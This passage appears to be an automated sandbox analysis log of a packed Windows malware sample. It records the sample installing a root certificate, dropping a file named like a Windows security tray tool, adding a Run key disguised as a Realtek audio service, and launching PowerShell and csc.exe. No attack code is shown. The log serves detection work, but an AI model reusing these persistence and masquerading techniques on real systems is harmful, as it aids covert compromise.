                      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: WdlA0C4PkO.exeStatic file information: File size 3469824 > 1048576
                      Source: WdlA0C4PkO.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x34ee00
                      Source: WdlA0C4PkO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdb source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: a1.pdbTa source: powershell.exe, 00000012.00000002.1738126119.000001FCAB7CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdbhPR source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                      Source: WdlA0C4PkO.exeStatic PE information: section name: UPX2
                      Source: SecurityHealthSystray.exe.0.drStatic PE information: section name: UPX2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8878AD2A5 pushad ; iretd 12_2_00007FF8878AD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879C5073 pushad ; retf 12_2_00007FF8879C5083
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879C2395 pushad ; retf 12_2_00007FF8879C23C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879CB6A3 push edi; ret 12_2_00007FF8879CB692
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879CB693 push edi; ret 12_2_00007FF8879CB6A2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879CBEF3 pushfd ; ret 12_2_00007FF8879CBEFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879C8A0A push ebx; retn 0009h12_2_00007FF8879C8A2A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879CB663 push edi; ret 12_2_00007FF8879CB692
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8879CB5A3 push edx; ret 12_2_00007FF8879CB61A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF887A977B6 push ecx; ret 12_2_00007FF887A977B8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF887A971C9 push ebx; retf 12_2_00007FF887A971CA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF8879B5033 push ds; ret 18_2_00007FF8879B5062
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF8879B4FCA push ss; ret 18_2_00007FF8879B4FCC
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1

                      Persistence and Installation Behavior

                      barindex
                      Installs new ROOT certificates
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Uses cmd line tools excessively to alter registry or file data
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: attrib.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dllJump to dropped file
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgrJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal ServiceJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal ServiceJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
